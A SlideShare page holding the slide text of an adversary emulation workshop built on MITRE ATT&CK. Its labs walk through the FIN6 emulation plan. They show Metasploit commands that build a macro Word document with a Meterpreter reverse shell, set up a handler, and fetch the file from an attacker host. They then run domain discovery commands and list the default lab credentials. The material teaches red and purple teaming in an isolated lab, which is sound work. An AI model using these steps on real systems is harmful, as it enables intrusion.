MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE - ATT&CKcon
 
PDF
Red Team Framework
👀 Joe Gray
 
PDF
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
PDF
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE - ATT&CKcon
 
PDF
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
PPTX
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
 
PDF
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
PDF
Threat Hunting Report
Morane Decriem
 
PDF
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
PDF
Red Team Methodology - A Naked Look
Jason Lang
 
PDF
Penetration Testing Execution Phases
Nasir Bhutta
 
PPTX
Red team Engagement
Indranil Banerjee
 
PDF
How to Plan Purple Team Exercises
Haydn Johnson
 
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE - ATT&CKcon
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Introduction to red team operations
Sunny Neo
 
The ATT&CK Latin American APT Playbook
MITRE ATT&CK
 
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
Purple Teaming with ATT&CK - x33fcon 2018
Christopher Korban
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE - ATT&CKcon
 
Red Team Framework
👀 Joe Gray
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincen...
MITRE - ATT&CKcon
 
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Jorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
Threat Hunting Report
Morane Decriem
 
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Red Team Methodology - A Naked Look
Jason Lang
 
Penetration Testing Execution Phases
Nasir Bhutta
 
Red team Engagement
Indranil Banerjee
 
How to Plan Purple Team Exercises
Haydn Johnson
 
Ad

Similar to Adversary Emulation Workshop (20)

PDF
Proactive cyber defence through adversary emulation for improving your securi...
idsecconf
 
PPTX
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
DOCX
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Shakas Technologies
 
PDF
Emulating an Adversary with Imperfect Intelligence
Adam Pennington
 
PPTX
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Jorge Orchilles
 
PDF
Cuddling the Cozy Bear Emulating APT29
Jorge Orchilles
 
PPTX
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Jorge Orchilles
 
PDF
NVISO - A Journey Through Adversary Emulation - Jonas Bauters
NVISO
 
PDF
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
PPTX
Adversary Emulation - DerpCon
Jorge Orchilles
 
PDF
So you want to be a red teamer
Jorge Orchilles
 
PPTX
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Christopher Korban
 
PDF
Evolution of Offensive Assessments - RootCon
Jorge Orchilles
 
PDF
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
Robert Brandel
 
PDF
SCYTHE Purple Team Workshop with Tim Schulz
Jorge Orchilles
 
PPTX
Adversary simulation
Chris Hernandez
 
PPTX
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Jorge Orchilles
 
PPTX
MITRE ATT&CK Fundamentals Webinar - Day 3.pptx
ssuser8b5015
 
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 
PDF
Purple Team Use Case - Security Weekly
Jorge Orchilles
 
Proactive cyber defence through adversary emulation for improving your securi...
idsecconf
 
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
Shakas Technologies
 
Emulating an Adversary with Imperfect Intelligence
Adam Pennington
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Jorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Jorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Jorge Orchilles
 
NVISO - A Journey Through Adversary Emulation - Jonas Bauters
NVISO
 
Threat-Based Adversary Emulation with MITRE ATT&CK
Katie Nickels
 
Adversary Emulation - DerpCon
Jorge Orchilles
 
So you want to be a red teamer
Jorge Orchilles
 
Evolution of Offensive Testing - ATT&CK-based Adversary Emulation Plans
Christopher Korban
 
Evolution of Offensive Assessments - RootCon
Jorge Orchilles
 
Slideshare.net rh-isac summit 2019 - adam pennington - leveraging mitre at ta...
Robert Brandel
 
SCYTHE Purple Team Workshop with Tim Schulz
Jorge Orchilles
 
Adversary simulation
Chris Hernandez
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Jorge Orchilles
 
MITRE ATT&CK Fundamentals Webinar - Day 3.pptx
ssuser8b5015
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
Scott Sutherland
 
Purple Team Use Case - Security Weekly
Jorge Orchilles
 
Ad

Recently uploaded (20)

PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
PPTX
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Encapsulation theory and applications.pdf
gurumoop
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Approach and Philosophy of On baking technology
30anthuong17
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 

Adversary Emulation Workshop

  • 1. Adversary Emulation using MITRE ATT&CK Sachin Deodhar CISSP, CPSA, GCFA, GDAT
  • 2. Introducing Adversary Emulation Objectives: - Identify common cybersecurity assessment problems - Introduce adversary emulation concepts and methodology to address cyber threats proactively - Introduce MITRE ATT&CK as a framework to guide Adversary Emulation exercises - Describe a case study of on how to emulate APT Group attacks
  • 3. Lets ponder over some philosophical questions: Genesis of the Adversary Emulation discipline
  • 4. Common Assessment Problems Enterprises often want to understand their cybersecurity effectiveness. Common questions which arise are: - Are the enterprise employees trained and alert? - Are the internal processes to manage incidents effective? - Are enterprise technologies properly configured and delivering value?
  • 5. Common Assessment Problems (contd.) Some of the common assessment techniques used in the industry are: - Threat Hunting - Red Teaming - Penetration Testing - Vulnerability Assessment These techniques focus primarily on initial access vectors without diving much into the world of Post Exploitation TTPs. They are important initiatives but are not representative of real-world threats!
  • 6. Common Assessment Problems (contd.) Another significant problem observed with Red Team Exercises and Penetration tests is that often, Red and Blue teams are disincentivized from working together! It’s a Competition! They are reluctant to share their TTPs and the failure of one is often considered the success of the other! While Purple Teaming is way to get these conflicting forces to work together, this may not always be effective
  • 7. Enter Adversary Emulation Execute real-world adversary TTPs to assess and improve cybersecurity! MITRE ATT&CK: A Common Ontology (we will return to this later)
  • 8. How does Adversary Emulation help? - Adversary emulation (not simulation) helps organizations assess cybersecurity effectiveness against real-world threats, thereby enabling impactful improvements - Adversary emulation supports transparent disclosure of TTPs and findings - There's no need to withhold information because the TTPs are already in use in the wild - Because it's real-world, there is a greater sense of urgency to fix issues - Leverages MITRE ATT&CK to communicate adversary behaviors in a common language
  • 9. MITRE ATT&CK • MITRE ATT&CK is an adversary TTP emulation framework to describe APT attack vectors aka Tactics, Techniques and Procedures (TTPs) • Tactics: Key adversary goal (e.g. Initial Access) • Techniques: A technique to achieve the desired goal (e.g. Spear Phishing) • Sub-technique: A specific example of a Technique (Spear Phishing → Spear Phishing via File Attachment • Procedure: A tool or script designed to operationalize a specific (Sub) Technique (e.g. Phishing Framework)
  • 10. MITRE ATT&CK Usage • Identify and understand APT attack TTPs • Training tool for CTI analysts, defenders and red team operators • Attack campaign planning tool for Red Team Operations (Consultants and Enterprise) • Granular analysis of attacker TTPs across multiple APT actors/groups Examples coming up!
  • 11. ATT&CK Enterprise Matrix Can't see much can you? ☺
  • 12. MITRE ATT&CK Navigator Tooling the Matrix – RED Pill or BLUE • Sorry had to bring in a reference to my favorite movie! • Let's switch to something “Live”
  • 14. Creating a New Campaign Layer
  • 15. Researching APT Threat Actors/Groups
  • 17. Mapping APT group TTPs on ATT&CK Graph
  • 18. Planning a Red Team Op with MITRE ATT&CK Let's use Sandworm as an example Who or what is Sandworm
  • 20. Adv. Example: Overlap Analysis with MITRE ATT&CK (APT29 || Sandworm)
  • 25. Adversary Emulation Overview Objectives: - Explain the purpose of Adversary Emulation - Describe Adversary Emulation characteristics - List common Adversary Emulation use cases
  • 26. What is Adversary Emulation? • There is no standard definition to codify the discipline: • Sometimes, it is referred to as Threat Emulation • Sometimes, it is referred to as Simulation instead of Emulation There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard thread emulation, purple teaming, and attack simulation to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other. - Raphael Mudge(Cobalt Strike)
  • 27. Example Definitions [Adversary Emulation] is a type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary. - Jorge Orchilles, Scythe Adversary Emulation and Red Team Exercises (Educause) Emulating an adversary group means duplicating their behavior with precision and exactness…Simulating an adversary group means becoming a composite of behaviors (TTPs) from one or more adversary groups, potentially with new behaviors (TTPs) not previously used by that adversary group. - Tim MalcomVetter, Cyderes Emulation, Simulation, & False Flags Adversary emulation is an impersonation, mimicking of someone or something else. Based on threat intelligence, you determine APT28 is most likely to target your organization. To emulate this adversary, you mimic the TTPs they use and test those in your environment. You behave exactly like they would. - Jonas Bauters, NVISO Labs What’s in a name? Thoughts on Red Team nomenclature
  • 28. How would I define it? • Emulation or Simulation? • The terms threat/adversary emulation/simulation are frequently used interchangeably • Some people impart precise meaning to the terms • Personal preference is to use Adversary Emulation Adversary Emulation is an intelligence driven discipline that entails researching, modeling, and executing cyber adversary tactics, techniques, and procedures (TTPs) to assess and improve cybersecurity.
  • 29. Key Characteristics - Based on real-world threats - Behavior Focused Pyramid of Pain
  • 30. Key Characteristics (contd.) - Transparent - Collaborative - Repeatable Secondary Characteristics These characteristics support professional and impactful engagements
  • 31. Adversary Emulation Use Cases • Assessment and Improvement • Exercise personnel • Assess organizational processes • Evaluate technology • Capability Development • Create/modify tools and analytics based on adversary TTPs • Professional Development • Improve knowledge of ATT&CK and adversary behaviors
  • 32. Adversary Emulation Framework Objectives: - Explain the purpose of Adversary Emulation Framework - Understand how the Adversary Emulation Framework works
  • 33. Adversary Emulation Framework • Iterative process to guide adversary emulation activities • Aligned with the organization's cybersecurity goals • CTI driven • Methodical • Not a rigid process • It is common to revisit previous steps
  • 35. Define The Objective • Work with the network owners to help define their adversary emulation objectives • What cybersecurity problem is being addressed and why?
  • 36. Research Adversary TTPs • Research CTI to inform which TTs you will emulate • What cyber adversaries are of salient interest to the organization? • What are their TTPs? • ATT&CK is used extensively • Common language for describing adversary TTPs • Summarized adversary descriptions • CTI sources
  • 37. Plan The Activity • Professional Adversary Emulation requires planning • Scope • Schedule • Rules of Engagement • Written Approval • Communications Plan
  • 38. Implement TTPs • Implement TTPs into a usable format • Striving for realism • Balancing project constraints • Consolidate TTPs into the Adversary Emulation Plan • Collection of resources used to execute adversary TTs
  • 39. Conduct the Activity • Execute the Adversary Emulation Plan • Execute Each TTP • Was it detected/prevented? • Communicate and document activities and findings
  • 40. Conclude the Activity • Concluding the activity typically entails: • Providing reports, presentations • Providing recommendations, mitigations • Supporting improvements • Lessons learned
  • 41. Defining Engagement Objectives Objectives: - Explain why defining engagement objectives is necessary - Discuss the purpose of engagement objectives - Ask questions to help network owners define engagement objectives
  • 42. Defining Engagement Objectives • Many questions are raised when we begin planning adversary emulation activities: • What adversary will we emulate? • What TTPs will we implement? • How will we execute these TTPs? • These answers should be driven by the engagement objectives • Ensures our adversary emulation activities are aligned with the organization's security goals.
  • 43. Defining Engagement Objectives (contd.) • Engagement objectives define our goal: • "What are we trying to achieve with adversary emulation, and why?“ • Common examples from network owners: • We would like to emulate APT 29 TTPs to exercise our SOC staff • We would like to emulate adversary TTPs to evaluate our ED solution • We would like to emulate adversary TTPs because... ??? • Network owners commonly need guidance to define good adversary emulation engagement objectives
  • 44. Questions to ask Network Owners • Ask questions to help network owners articulate their goals and priorities: • Why are you seeking an adversary emulation engagement? • What cyber threats are you concerned about? • What ATT&CK TTPs can you detect? • Be cognizant of the organization's goals and security maturity • Adversary emulation may not be appropriate for all use cases • They may not be ready for adversary emulation if they don't have foundational security practices in place
  • 45. Introducing the Adversary Emulation Plan Objectives: - Explain the purpose of the adversary emulation plan - List components that make up an adversary emulation plan - Gain familiarity with the Center for Threat Informed Defense (CTID)Adversary Emulation Library.
  • 46. Adversary Emulation Plan Overview What is an Adversary Emulation Plan? - Collection of resources that enables operators to emulate adversary TTPs - Provides step-by-step execution instructions - Incudes supporting resources (binaries, scripts, diagrams, ATT&CK navigator layers, etc.)
  • 47. Adversary Emulation Plan Components • Adversary emulation plan components commonly include: • Adversary overview - objectives, targets, and tools • CTI - intelligence summary and sources • Diagrams - ATT&CK Navigator layers, operations flow diagrams • Written Procedures - setup and execution instructions • Resources - tools, binaries, scripts needed for execution • Mitigations - observables, artifacts, signatures, rules, etc
  • 48. Adversary Overview Describe adversary’s objectives, targets, and tools
  • 49. Cyber Threat Intelligence Include CTI sources used to generate emulation plans
  • 50. Diagrams Operations flow and ATT&CK navigation Layers provide helpful visualizations APT 29 Diagrams
  • 51. Written Procedures Setup and Execution Instructions
  • 52. Resources All tools, binaries, scripts, and other resources needed to execute the emulation plan
  • 53. Mitigations Rules and signatures to aid TTP prevention, detection, and response
  • 54. CTID Adversary Emulation Library • A free library containing Adversary Emulation Plans https://github.com/center-for-threat-informed-defense/adversary_emulation_library
  • 55. Touring the CTID Adversary Emulation Library # Lab 1
  • 56. Step 1: Access the library • Your first task is to access the CTID Adversary Emulation Library. • Open a web browser and navigate to the library using the following URL: https://github.com/center-for-threat-informed-defense/adversary_emulation_library
  • 57. Step 2: Explore the project README • We’ll now develop an understanding of the CTID Adversary Emulation Library project’s philosophy and general structure. Click the project README file and take a few minutes to read through its contents. (Note: README is a simple text file in markdown format. README files are commonly used to provide basic documentation about a project, such as its purpose, installation and usage instructions, license information, etc.)
  • 58. Step 2: Explore the project README (contd.) • The project README lists several adversary emulation plans available for your use. Are any of these threat actors relevant to your organization?
  • 59. Step 3: Understand the FIN6 Emulation Plan Components • We’re going to explore the FIN6 adversary emulation plan so you can study its components and content. The purpose of this exercise is to prime your understanding as we will execute the FIN6 emulation plan in an upcoming lab. Navigate to the FIN6 emulation plan directory and you should be greeted with the following:
  • 60. Step 3: Understand the FIN6 Emulation Plan Components (contd.) • Take a moment to read through the FIN6 README. Note that the README provides a link to a video that demonstrates the CTID Emulation Library in action by its original authors; this video is highly recommended to supplement your learning. Also observe the emulation plan components, which can be seen in the FIN6 table of contents (see image below)
  • 61. Step 4: Explore the FIN6 Intelligence Summary • The CTID Adversary Emulation Library provides cyber threat intelligence summaries for each of its emulation plans. The intelligence summaries describe the emulated actor’s objectives, targets, and observed TTPs based on publicly available reporting. Navigate to the FIN6 intelligence summary from the FIN6 table of contents (see image below).
  • 62. Step 4: Explore the FIN6 Intelligence Summary (contd.) • After clicking the link, you should be on a page that resembles the following screenshot. • Read through FIN6 intelligence summary; try to understand FIN6’s objectives, target industries, and general TTPs.
  • 63. Step 5: Explore the FIN6 Operations Flow • The Operations Flow page describes how the emulated actor works towards achieving their objectives. The operations flow helps visualize how to logically chain together major steps the emulated actor commonly performs during an operation. Navigate to the FIN6 Operations Flow from the FIN6 table of contents (see image below).
  • 64. Step 5: Explore the FIN6 Operations Flow (contd.) • After clicking the link to the Operations Flow, you should see a page resembling the following screenshot.
  • 65. Step 6: Explore the FIN6 Adversary Emulation Scenarios • Now that you are familiar with the FIN6 intelligence summary and operations flow, we are going to explore the FIN6 adversary emulation scenarios. The adversary emulation scenarios provide step-by-step instructions for executing the emulated actor’s TTPs, and also provide guidance on how to setup any required tools and/or infrastructure. Let’s look at these scenarios in detail. Navigate to the FIN6 Emulation Plan folder from the root of the FIN6 folder by clicking the “Emulation Plan” directory in the GitHub file browser (see image below).
  • 66. Step 6: Explore the FIN6 Adversary Emulation Scenarios (contd.) • From the FIN6 Emulation Plan Folder, you should see a page that resembles the following screenshot.
  • 67. Step 6: Explore the FIN6 Adversary Emulation Scenarios (contd.) • Start by reviewing the contents of Infrastructure.md • This document provides guidance on tools and infrastructure needed to complete the adversary emulation scenario. • Next, skim through the Phase1.md file • Do you see any TTPs you haven’t seen before? • Review the machine-readable YAML file, FIN6.yaml • This file is designed to be ingested by an automated adversary emulation framework such as CALDERA. In a future module, we will demonstrate how to execute adversary emulation scenarios automatically.
  • 68. Setting Up Your Own Lab Environment # Lab 2
  • 69. Requirements • Internet Access • Elevated privileges to install hypervisor software, such as VirtualBox • This lab requires sufficient resources to run Kali Linux and Windows Server 2019 virtual machines concurrently. The following minimum hardware specifications are recommended: • 8 GB RAM • 75 GB free disk space • 4 core 2 GHz CPU
  • 70. MALWARE WARNING! Fundamentally, this lab entails executing publicly known adversary TTPs so that we can assess and improve cybersecurity. As a result, many of the tools and resources will likely be flagged malicious by security products. As a precaution, you should not perform these labs on any system that contains sensitive data. Additionally, you should never use capabilities and/or techniques taught in this course without first obtaining explicit written permission from the system/network owner(s).
  • 71. Step 1: Download and Install a Hypervisor • A hypervisor is software that can create and run Virtual Machines. Virtual machines enable you to run guest operating systems on your host computer. We will use a hypervisor in order to run virtual machines running Kali Linux and Windows Server 2019 • Download and install the hypervisor of your choice; This talk will utilize VirtualBox, as it is freely available and supported on most operating systems (Windows, Mac, and Linux)
  • 72. Step 1: Download and Install a Hypervisor(contd) • Install the necessary version according to your platform. • As a bonus, also download the extension pack.
  • 73. Step 1: Download and Install a Hypervisor(contd) • Follow the onscreen steps to install VirtualBox
  • 74. Step 2: Install Kali Linux and Windows Server • Go To https://www.kali.org/get-kali/#kali-virtual-machines • Choose the appropriate image according to your hypervisor and download it (in our case, it is VirtualBox) • Double click on the image and hit OK to install Kali Linux • Go To https://www.microsoft.com/en-us/evalcenter/evaluate- windows-server-2019 • Download the Windows Server 2019 ISO • Install the ISO in your hypervisor
  • 75. [ Optional ] Steps • Install the extension packs • Install Guest Additions • Take a snapshot of the machine states
  • 76. Step 3: Configuring the VMs • Go to https://github.com/maddev-engenuity/AdversaryEmulation • Download/Clone the repository on each of the Virtual Machines • Navigate to the directory containing the repository head $ cd vm_setup_scripts/kali $ sudo ./setup-kali-vm.sh • On Windows, open an Administrative Powershell session and run the following commands: • On Kali, type the following command: cd .vm_setup_scriptswindows_server .setup-dc.ps1
  • 77. Step 3: Configuring the VMs (contd.) • When the setup processes are complete, the following accounts would be created on the respective VMs: • On Kali, a user will be created with the following credentials: • Username: attacker • Password: ATT&CK • On Windows Server 2019, a new user would be created with the following account credentials: • Username: MADmadAdmin • Password: ATT&CK
  • 78. Executing the FIN6 Emulation Plan # Lab 3
  • 79. Step 1: Access the Emulation Plan • Our first task is to access the CTID FIN6 Adversary Emulation Plan. We will be executing Phase 1 of the emulation. Navigate to the library using the following URL: https://github.com/center-for-threat-informed- defense/adversary_emulation_library/blob/master/fin6/E mulation_Plan/Phase1.md
  • 80. Step 1: Access the Emulation Plan (contd.) Examining this plan, we see that there are 4 steps: • Initial Access • Discovery • Privilege Escalation, and • Collection and Exfiltration However, Initial Access does not have specific procedures provided. We’ll fill in this blank with our own procedure based on Cyber Threat Intelligence (CTI).
  • 81. Step 2: Create Initial Access Payload The CTID Emulation Plan begins with an adversary performing discovery techniques on the target system. For this to be possible, the adversary first needs to gain access to the target system. Looking at the ATT&CK page for FIN6, we see that they have used the Phishing: Spear Phishing Attachment technique (T1566.001) to gain initial access. We’ll perform that technique using Metasploit’s Office Word Macro exploit, which we create on the Kali attacker VM. First, in a terminal window, as the attacker user, navigate to the proper directory by typing: cd AdversaryEmulation/labs/lab_1.3
  • 82. Step 2: Create Initial Access Payload (contd.) Then start msfconsole as sudo by typing: sudo msfconsole -q Select the Office Word Macro exploit using the following command: use exploit/multi/fileformat/office_word_macro
  • 83. Step 2: Create Initial Access Payload (contd.) As seen in the screenshot, Metasploit automatically configures the exploit to use the staged Windows Meterpreter TCP reverse shell. This is the x86 version of Meterpreter. In order to dump credentials with Mimikatz later in this lab, we need to use the x64 version. To do so, run the following command: set payload windows/x64/meterpreter/reverse_tcp We now need to configure the payload and exploit appropriately so the Meterpreter shell can connect back to our machine. Let’s list the various options for the payload and exploit using: show options
  • 84. Step 2: Create Initial Access Payload (contd.) We will use the default template provided with the exploit, so we don’t need to change the CUSTOMTEMPLATE or FILENAME Module options. We can also leave the EXITFUNC and LPORT Payload options alone. We don’t need to change LPORT either, but we will take note of it. We will need to change the LHOST option though so the Meterpreter shell knows which host to connect to. To do that, we first need to find our attackerVM host’s IP address. We can list it using the command: ip a
  • 85. Step 2: Create Initial Access Payload (contd.) Replace [attacker VM_ip_address] with your attacker VM IP address in the command above. Listing the options again shows that the IP address was successfully set. set LHOST [attackerVM_ip_address] Note: Your IP address may be different from the one shown in the image above. With this knowledge, we can set the LHOST option with the following command. Make sure to replace the placeholder with your host’s IP address:
  • 86. Step 2: Create Initial Access Payload (contd.) exploit With our options set, all we need to do to create the malicious Word document is to run the exploit with the command: Lastly, we’ll copy the document to our current lab_1.3 folder with the following command: cp /root/.msf4/local/msf.docm . The payload is now ready for delivery
  • 87. Step 3: Set up Payload Handler use exploit/multi/handler With our payload ready, we need a handler to accept the connection back from our target. We use msfconsole to set up this handler as well. First, select the exploit handler module by typing: Now, we need to inform the handler of the payload we are waiting for, which was: windows/x64/meterpreter/reverse_tcp set payload windows/x64/meterpreter/reverse_tcp Looking at the options, we see that LHOST needs to be set along with EXITFUNC to match our original payload’s option. We don’t need to set LPORT because it matches the options we set for the Word document payload.
  • 88. Step 3: Set up Payload Handler (contd.) As before, we set the LHOST option with the attackerVM's IP address: set payload windows/x64/meterpreter/reverse_tcp We also set the EXITFUNC option to be thread: set EXITFUNC thread
  • 89. Step 3: Set up Payload Handler (contd.) Lastly, we start the handler with the command: run When the Meterpreter reverse shell connects back to the attackerVM, the handler will accept the connection and begin an interactive session with the target.
  • 90. Step 4: Serve Payload The Phishing: Spearphishing Attachment technique (T1566.001) specifies that the malicious payload is sent as an attachment in an email. However, for sake of simplicity, we will be simply sending the file to the target via an HTTP download. cd /home/attacker/AdversaryEmulation/labs/labs1.3 First, we need to set up an HTTP server to serve the malicious Word document. Open a new terminal tab with Ctrl+Shift+t, and then navigate to the lab 1.3 directory by typing: Then, start a Python3 HTTP server on port 80 by typing: cd /home/attacker/AdversaryEmulation/labs/labs1.3
  • 91. Step 5: Download and Execute Payload Switch to the Windows host (targetDC). Use the following credentials to log in: • username: MADmadAdmin • password: ATT&CK Open PowerShell, and paste or type the following PowerShell command to download the payload to the Desktop. Make sure to replace the IP address placeholder with the IP address of the attackerVM: Invoke-WebRequest -Uri http://[attackerVM_IP_address]/msf.docm -OutFile C:UsersmadAdminDesktopmsf.docm
  • 92. Step 5: Download and Execute Payload(contd.) You can now close the PowerShell window, as the payload has been delivered to the target. Parts of this emulation plan require elevated access. Normally, Microsoft Word is run in a low privilege context, which means the reverse shell that the adversary receives also is in a low privilege context. The adversary would then need to elevate their privileges somehow, such as by using a UAC Bypass exploit. To simplify the process here, and not stray too far from the existing emulation plan, we’ll start Word in an elevated context, so that the reverse shell we receive is also in an elevated context to begin with. Click on the search box in the Windows taskbar and type in ‘Word’. Right-click on the Microsoft Word result, select ‘Run as Administrator’, and then click Yes on the resulting UAC prompt. This will start Word in an elevated context.
  • 93. Step 5: Download and Execute Payload(contd.) Click through any spurious popups that are opened by Word. From here, open ‘msf.docm’ that we downloaded to the Desktop. Then, click on the Enable Macros prompt shown in the image below to allow the payload to execute.
  • 94. Step 5: Download and Execute Payload(contd.) Switch back to the msfconsole terminal window on the attackerVM. You should see that the handler received a callback from the (Windows) targetDC, with a new meterpreter session created. Type: We see that we are the MADmadAdmin user. getuid Take note of the IP address the connection was received from – this is the (Windows) targetDC’s IP address. In this case, it is 192.168.57.104.
  • 95. Step 6: Account Discovery: Domain Account Now that we have a Meterpreter session on the targetDC, we can begin following the techniques listed in the FIN6 Emulation Plan. Most of the techniques presented in the Emulation Plan are provided with a FIN6 procedure and an Alternative procedure. In an actual Emulation exercise, you would most likely only execute one procedure for the technique. However, as this is a learning exercise, we will perform both the FIN6 and Alternative procedures where possible. Most of the specific procedures presented from this point onwards are taken directly from the CTID FIN6 Emulation Plan with minimal variation, mostly in the form of differentiating output filenames between the FIN6 and Alternative procedures. Additional instruction to facilitate execution of those procedures is provided in this walkthrough as well. FIN6 starts with some discovery commands on the domain, using a 3rd party tool called AdFind. AdFind has been prepositioned on the targetDC for sake of simplicity. In testing, AdFind was found to not work well with the default Command Prompt shell available in Meterpreter. So, in this lab, we use a PowerShell session instead. The procedures are also modified accordingly to work in PowerShell. Let’s drop down into a PowerShell session by running the following commands: load powershell powershell_shell
  • 96. Step 6: Account Discovery: Domain Account (contd.) The discovery procedures write the results of the discovery commands to files. To keep everything tidy, first navigate to the Public user’s home directory, which is where we’ll write the output files: cd C:UsersPublic The first discovery technique in the plan is Account Discovery: Domain Account (T1087.002). The primary procedure for this technique as provided in the emulation plan is: adfind.exe -f "objectcategory=person" > ad_users.txt After running the command, we can view the contents of the output file with the type command: type ad_users.txt
  • 98. Step 6: Account Discovery: Domain Account (contd.) The alternate procedure uses the net user utility. We modify the command from the FIN6 emulation plan by changing the name of the output file: net user /domain > ad_users_net.txt
  • 99. Step 7: Remote System Discovery Following the discovery of the users on the domain, FIN6 performs Remote System Discovery (T1018) to identify computer objects on the domain. The FIN6 procedure is: adfind.exe -f "objectcategory=computer" > ad_computers.txt
  • 100. Step 7: Remote System Discovery (contd.) The Alternative procedure is: net group "Domain Computers" /domain > ad_computers_net.txt
  • 101. Step 8: Domain Trust Discovery First, FIN6 enumerates all Organizational Units in the current user’s domain: adfind.exe -f "objectcategory=organizationalUnit" > ad_ous.txt With information on domain users and computers obtained, FIN6 performs Domain Trust Discovery (T1482) using 2 separate procedures.
  • 102. Step 8: Domain Trust Discovery (contd.) Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A > ad_ous_ps.txt Alternative procedure: Next, FIN6 performs a full forest search for trust objects using AdFind’s trustdmp feature. As there are no other domains within the Active Directory forest for this environment, this command will return no results, but we perform it anyway to complete the emulation: adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
  • 103. Step 8: Domain Trust Discovery (contd.) nltest /domain_trusts > ad_trustdmp_nltest.txt Alternative procedure:
